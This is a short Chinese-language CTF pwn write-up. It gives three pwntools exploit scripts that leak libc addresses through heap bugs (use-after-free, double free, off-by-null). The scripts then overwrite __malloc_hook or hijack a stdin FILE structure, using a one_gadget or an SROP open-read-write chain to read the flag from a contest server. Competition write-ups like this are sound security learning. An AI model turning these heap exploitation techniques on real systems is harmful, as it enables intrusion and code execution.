把三个简单的做了,mipspwn 是个栈溢出貌似,repwn需要逆向那个算法,然后leak stack地址和libc地址,server是个GET POST传参的菜单堆UAF洞附件
sign_in
简单的UAF,一个double free 打到malloc_hook,然后realloc修栈
1 | from pwn import* |
2 | context.log_level = 'DEBUG' |
3 | def menu(ch): |
4 | p.sendlineafter('choice :',str(ch)) |
5 | def new(size,name,content): |
6 | menu(1) |
7 | p.sendlineafter("game's name:",str(size)) |
8 | p.sendafter("game's name:",name) |
9 | p.sendlineafter("game's message:",content) |
10 | def free(index): |
11 | menu(3) |
12 | p.sendlineafter('index:',str(index)) |
13 | def show(): |
14 | menu(2) |
15 | |
16 | |
17 | p = process('./main') |
18 | #p = remote('183.129.189.60',10029) |
19 | libc = ELF('./libc-2.23.so') |
20 | new(0x100,'FMYY','FMYY') |
21 | new(0x68,'FMYY','FMYY') |
22 | new(0x68,'FMYY','FMYY') |
23 | free(0) |
24 | new(0xD0,'\x78','\x78') |
25 | show() |
26 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 88 - 0x10 |
27 | log.info('LIBC:\t' + hex(libc_base)) |
28 | malloc_hook = libc_base + libc.sym['__malloc_hook'] |
29 | rce = libc_base + 0xF1207 |
30 | realloc = libc_base + libc.sym['realloc'] |
31 | free(1) |
32 | free(2) |
33 | free(1) |
34 | new(0x68,p64(malloc_hook - 0x23),'FMYY') |
35 | new(0x68,'FMYY','FMYY') |
36 | new(0x68,'FMYY','FMYY') |
37 | new(0x68,'\x00'*(0x13-8) + p64(rce) + p64(realloc + 4),'FMYY') |
38 | menu(1) |
39 | p.interactive() |
easy_heap
简单的off by null,2.31的,然后有个沙盒,用malloc_hook + IO + SROP的劫持方法做即可 orw flag
1 | from pwn import* |
2 | context.arch = 'AMD64' |
3 | #context.log_level = 'DEBUG' |
4 | def menu(ch): |
5 | p.sendlineafter('Choice:',str(ch)) |
6 | def new(size): |
7 | menu(1) |
8 | p.sendlineafter('Size: ',str(size)) |
9 | def edit(index,content): |
10 | menu(2) |
11 | p.sendlineafter('Index:',str(index)) |
12 | p.sendafter('Content:',content) |
13 | def free(index): |
14 | menu(3) |
15 | p.sendlineafter('Index:',str(index)) |
16 | def show(index): |
17 | menu(4) |
18 | p.sendlineafter('Index:',str(index)) |
19 | p = process('./main') |
20 | p = remote('183.129.189.60',10009) |
21 | libc =ELF('./libc-2.31.so') |
22 | for i in range(4): |
23 | new(0x1000) |
24 | new(0x1000-0x3E0 - 0x50 + 0x10) |
25 | #--large bin |
26 | for i in range(7): |
27 | new(0x28) |
28 | new(0xB20) |
29 | new(0x10) |
30 | |
31 | free(12) |
32 | new(0x1000) |
33 | new(0x28) #14 |
34 | edit(14,p64(0) + p64(0x521) + '\x40') |
35 | #-- |
36 | #-- small bin |
37 | new(0x28) #15 |
38 | new(0x28) #16 |
39 | new(0x28) #17 |
40 | new(0x28) #18 |
41 | |
42 | for i in range(7): #5 - 11 |
43 | free(5+i) |
44 | |
45 | free(17) |
46 | free(15) |
47 | |
48 | for i in range(7): |
49 | new(0x28) |
50 | |
51 | new(0x400) #15 |
52 | |
53 | new(0x28) #17 |
54 | edit(17,p64(0) + '\x20') |
55 | new(0x28) # clear the tcache bin |
56 | #-- |
57 | |
58 | #--fast bin |
59 | for i in range(7): |
60 | free(5 + i) |
61 | free(16) |
62 | free(14) |
63 | for i in range(7): |
64 | new(0x28) |
65 | new(0x28) |
66 | edit(14,'\x20') |
67 | new(0x28) |
68 | #-- |
69 | new(0x28) #20 |
70 | new(0x5F8) |
71 | free(20) |
72 | new(0x28) |
73 | edit(20,'\x00'*0x20 + p64(0x520)) |
74 | free(21) |
75 | new(0x40) |
76 | new(0x40) |
77 | show(16) |
78 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook'] |
79 | log.info('LIBC:\t' + hex(libc_base)) |
80 | free_hook = libc_base + libc.sym['__free_hook'] |
81 | system = libc_base + libc.sym['system'] |
82 | IO_stdin = libc_base + libc.sym['_IO_2_1_stdin_'] |
83 | free(22) |
84 | free(14) |
85 | new(0x28) |
86 | edit(14,p64(0) + p64(0x301)) |
87 | new(0x2F0) |
88 | free(22) |
89 | free(21) |
90 | free(14) |
91 | new(0x28) |
92 | edit(14,'\x00'*0x10 + p64(IO_stdin)) |
93 | ################ |
94 | pop_rdi_ret = libc_base + 0x0000000000026B72 |
95 | pop_rdx_r12 = libc_base + 0x000000000011C1E1 |
96 | pop_rsi_ret = libc_base + 0x0000000000027529 |
97 | pop_rax_ret = libc_base + 0x000000000004A550 |
98 | jmp_rsi = libc_base + 0x00000000001105BD |
99 | |
100 | |
101 | syscall = libc_base + libc.sym['syscall'] |
102 | |
103 | target = libc_base + libc.sym['_IO_2_1_stdin_'] |
104 | address = libc.sym['__free_hook'] + libc_base |
105 | IO_str_jumps = libc_base + 0x1ED560 |
106 | frame_address = target + 0xE0 |
107 | |
108 | Open = libc_base + libc.symbols["open"] |
109 | Read = libc_base + libc.symbols["read"] |
110 | Puts = libc_base + libc.symbols['puts'] |
111 | free_hook = address |
112 | IO = '\x00'*0x28 |
113 | IO += p64(frame_address) |
114 | IO = IO.ljust(0xD8,'\x00') |
115 | IO += p64(IO_str_jumps) |
116 | read = libc_base + libc.sym['read'] |
117 | frame = SigreturnFrame() |
118 | frame.rax = 0 |
119 | frame.rdi = 0 |
120 | frame.rsi = address |
121 | frame.rdx = 0x2000 |
122 | frame.rsp = address |
123 | frame.rip = Read |
124 | |
125 | |
126 | orw = p64(pop_rdi_ret)+p64(free_hook + 0xF8) |
127 | orw += p64(pop_rsi_ret)+p64(0) |
128 | orw += p64(Open) |
129 | orw += p64(pop_rdi_ret) + p64(3) |
130 | orw += p64(pop_rdx_r12) + p64(0x30) + p64(0) |
131 | orw += p64(pop_rsi_ret) + p64(free_hook+0x100) |
132 | orw += p64(Read) |
133 | orw += p64(pop_rdi_ret)+p64(free_hook+0x100) |
134 | orw += p64(Puts) |
135 | orw = orw.ljust(0xF8,'\x00') |
136 | orw += './flag\x00\x00' |
137 | IO += str(frame) |
138 | IO += 'F'*0x18 + p64(libc_base + libc.sym['setcontext'] + 61) |
139 | ############### |
140 | new(0x2F0) |
141 | new(0x2F0) |
142 | log.success('Now') |
143 | edit(22,IO) |
144 | menu(5) |
145 | p.sendlineafter('bye bye!',orw) |
146 | p.interactive() |
babypwn
也是简单题,需要一个libc地址,释放一个块到fastbin,利用scanf输入数据过多会申请一个large bin chunk,故可以将fastbin中的chunk 放进small bin中,再申请回来拿到libc,一个double free申请过去即可打到malloc_hook
1 | from pwn import* |
2 | context.log_level = 'DEBUG' |
3 | def menu(ch): |
4 | p.sendlineafter('choice :',str(ch)) |
5 | def new(size,name,content,sign=1): |
6 | menu(1) |
7 | p.sendlineafter("game's name:",str(size)) |
8 | p.sendafter("game's name:",name) |
9 | if sign: |
10 | p.sendlineafter("game's message:",content) |
11 | else: |
12 | p.sendline(content) |
13 | def free(index): |
14 | menu(2) |
15 | p.sendlineafter('index:',str(index)) |
16 | |
17 | p = process('./main') |
18 | p = remote('183.129.189.60',10031) |
19 | libc =ELF('./libc-2.23.so') |
20 | new(0x28,'FMYY','FMYY') |
21 | new(0x60,'FMYY','FMYY') |
22 | new(0x60,'FMYY','FMYY') |
23 | new(0x60,'FMYY','FMYY') |
24 | free(2) |
25 | menu(1) |
26 | p.sendlineafter("game's name:",'0'*0x500) |
27 | free(0) |
28 | new(0x60,'\xDD\x25','FMYY') |
29 | free(1) |
30 | free(3) |
31 | free(1) |
32 | new(0x60,'\x30','FMYY') |
33 | new(0x60,'FMYY','FMYY') |
34 | new(0x60,'FMYY','FMYY') |
35 | new(0x60,'FMYY','FMYY') |
36 | new(0x60,'\x00'*0x33 + p64(0xFBAD1800) + p64(0)*3 + '\x88','FMYY',sign=0) |
37 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_'] |
38 | malloc_hook = libc_base + libc.sym['__malloc_hook'] |
39 | realloc = libc_base + libc.sym['realloc'] |
40 | rce = libc_base + 0xF1207 |
41 | free(5) |
42 | free(6) |
43 | free(5) |
44 | new(0x68,p64(malloc_hook - 0x23),'FMYY') |
45 | new(0x68,'FMYY','FMYY') |
46 | new(0x68,'FMYY','FMYY') |
47 | new(0x68,'\x00'*(0x13-8) + p64(rce) + p64(realloc + 4),'FMYY') |
48 | menu(1) |
49 | p.interactive() |